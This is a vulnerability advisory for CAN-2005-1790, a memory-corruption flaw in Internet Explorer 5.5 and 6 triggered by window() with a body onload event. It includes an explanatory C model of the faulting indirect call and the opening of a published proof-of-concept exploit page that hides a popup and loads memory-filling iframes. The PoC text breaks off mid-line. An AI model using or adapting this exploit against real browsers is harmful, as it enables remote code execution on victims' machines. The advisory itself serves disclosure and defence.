BUGTRAQ ID: 13799
CVE ID: CAN-2005-1790
CNCVE ID:CNCVE-20051790
Advisory date: 2005-11-21
Cause
Failure to handle exceptional conditions
Affected systems
Microsoft Internet Explorer 5.5 & 6.x
Impact
A remote attacker can exploit this flaw to corrupt memory and execute arbitrary code with the privileges of the browser process.
Conditions required for attack
The attacker must construct a malicious page and entice the user to open it in Internet Explorer.
Vulnerability details
Microsoft Internet Explorer is a widely used web browser.
Internet Explorer fails to correctly initialize the 'window()' function. A remote attacker can exploit this to corrupt memory and execute arbitrary code with the privileges of the process.
When the 'window()' function is used in combination with a <BODY onload> event, IE does not initialize it correctly, and as a result an exception occurs when IE attempts to call through the dereferenced 32-bit address held in ECX:
CALL DWORD [ECX+8]
Because of this flaw, ECX is inadvertently overwritten with Unicode text (reported as the string "OBJECT"; the value 0x006F005B is the UTF-16LE encoding of the characters "[o"). The address 0x006F005B points into invalid or unmapped memory, so the read at ECX+8 raises an exception and IE crashes. With carefully crafted page content that places attacker-controlled data at that address, the call target can be chosen by the attacker, making arbitrary code execution with the privileges of the process possible.
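The following C program is an added model of the fault described above; it is not code from the advisory or from Computer Terrorism. It shows how the first two UTF-16LE code units of a string such as "[object" become the value 0x006F005B when read as a 32-bit pointer, why CALL DWORD [ECX+8] then faults (the address 0x006F0063 is unmapped), and how the picture changes if the attacker has already filled that region of memory with a repeated byte. The filled region, the 0x0C fill byte and every function name here are constructed for illustration; the real exploit details are not on this page.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Value the advisory reports in ECX, and the operand offset of the faulting
 * instruction CALL DWORD [ECX+8]. */
#define ECX_OBSERVED 0x006F005Bu
#define SLOT_OFFSET  8u

/* Hypothetical model of one attacker-filled window of the 32-bit address
 * space. Anything outside it is treated as unmapped memory. */
typedef struct {
    uint32_t base;
    uint32_t size;
    const uint8_t *bytes;
} mem_region;

/* Little-endian 32-bit read from a byte buffer. */
static uint32_t rd32le(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Encode the first two characters of an ASCII string as UTF-16LE and read
 * the resulting four bytes as one 32-bit value. For "[object" this yields
 * bytes 5B 00 6F 00, i.e. 0x006F005B. */
uint32_t ecx_from_utf16le(const char *ascii)
{
    uint8_t buf[4] = {0, 0, 0, 0};
    int i;
    for (i = 0; i < 2 && ascii[i] != '\0'; i++) {
        buf[2 * i] = (uint8_t)ascii[i];   /* low byte: the character */
        buf[2 * i + 1] = 0;               /* high byte: zero for ASCII */
    }
    return rd32le(buf);
}

/* Model CALL DWORD [ECX+8]: returns 1 and stores the fetched target when
 * ECX+8 lies inside the filled region, 0 (access violation) otherwise. */
int resolve_call_target(const mem_region *m, uint32_t ecx, uint32_t *target)
{
    uint32_t slot = ecx + SLOT_OFFSET;
    if (m == NULL || slot < m->base || slot + 4 > m->base + m->size)
        return 0;                          /* unmapped read: IE crashes */
    *target = rd32le(m->bytes + (slot - m->base));
    return 1;
}

/* Does the dereference fault when no attacker data is mapped there? */
int faults_without_fill(uint32_t ecx)
{
    uint32_t t = 0;
    return !resolve_call_target(NULL, ecx, &t);
}

/* Constructed scenario: the 64 KiB around 0x006F0000 has been filled with
 * one repeated byte. A single-byte fill gives the same 32-bit value at every
 * alignment, which matters because 0x006F0063 is not 4-byte aligned.
 * Returns the call target the CPU would fetch, or 0 if it still faults. */
uint32_t target_after_fill(uint8_t pattern)
{
    static uint8_t fill[0x10000];
    mem_region m;
    uint32_t target = 0;
    memset(fill, pattern, sizeof fill);
    m.base = 0x006F0000u;
    m.size = (uint32_t)sizeof fill;
    m.bytes = fill;
    if (!resolve_call_target(&m, ECX_OBSERVED, &target))
        return 0;
    return target;
}

int main(void)
{
    uint32_t ecx = ecx_from_utf16le("[object");
    printf("ECX from \"[object\" as UTF-16LE: 0x%08X\n", ecx);
    if (faults_without_fill(ecx))
        printf("read at 0x%08X hits unmapped memory: access violation\n",
               ecx + SLOT_OFFSET);
    printf("after filling 0x006F0000 with 0x0C: CALL target 0x%08X\n",
           target_after_fill(0x0C));
    return 0;
}
```

The model makes the practitioner's point concrete: the crash on an unpatched system is the same instruction that becomes a controlled indirect call once the bytes at ECX+8 are attacker-chosen, which is why a proof of concept for this class of bug spends its effort on filling memory rather than on the trigger itself.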
Proof of concept
<!--
Computer Terrorism (UK)
============================================
Microsoft Internet Explorer JavaScript Window() - Proof Of Concept
============================================
Author:
--------
Stuart Pearson
Computer Terrorism (UK)
www.computerterrorism.com
21st November, 2005
THE FOLLOWING PROOF OF CONCEPT IS PROVIDED EXCLUSIVELY FOR EDUCATIONAL
PURPOSES ONLY, AND IS PROVIDED AS IS, WITHOUT ANY EXPRESS OR IMPLIED
WARRANTY. IN PARTICULAR, NEITHER THE AUTHOR NOR COMPUTER TERRORISM
MAKES ANY REPRESENTATION OR WARRANTY OF ANY KIND CONCERNING THE FITNESS
OF THIS CODE FOR ANY PARTICULAR PURPOSE.
PERMISSION TO USE, COPY, PRINT, AND DISTRIBUTE THIS DOCUMENT FOR EDUCATIONAL
PURPOSES IS HEREBY GRANTED, PROVIDED THAT THE TEXTUAL CONTENT REMAINS INTACT
AND UNMODIFIED.
-->
<html>
<head>
<meta http-equiv="Content-Language" content="en-gb">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Computer Terrorism - Microsoft Internet Explorer Proof of Concept</title>
<script type="text/javascript">
function runpoc(iframecount)
{
document.getElementById('table1').rows[2].cells[0].innerHTML='<p align=center><B><font color=#339966 size=1 face=Arial> loading, please wait....</font></p>'
document.getElementById('table1').rows[4].cells[0].innerHTML=''
document.getElementById('table1').rows[6].cells[0].innerHTML=''
document.getElementById('table1').rows[7].cells[0].innerHTML=''
document.getElementById('table1').rows[9].cells[0].innerHTML=''
top.consoleRef = open('blankWindow.htm','BlankWindow',
'width=1,height=1'
+',menubar=0'
+',toolbar=1'
+',status=0'
+',scrollbars=0'
+',left=1'
+',top=1'
+',resizable=0')
top.consoleRef.blur();
top.consoleRef.document.writeln(
'<html>'
+'<head>'
+'<title>CT</title>'
+'</head>'
+'<body onBlur=self.blur()>'
+'</body></html>'
)
self.focus() // Ensure the javascript prompt boxes are hidden in the background
for (i=1 ; i <=iframecount ; i++)
{
top.consoleRef.document.writeln('<iframe width=1 height=1 border=0 frameborder=0 src=fillmem.htm></iframe>')
}
if( iframecount == 8 ){
//alert(Ǝ');
top.consoleRef.document.writeln('<iframe width=1 height=1 border=0 frameborder=0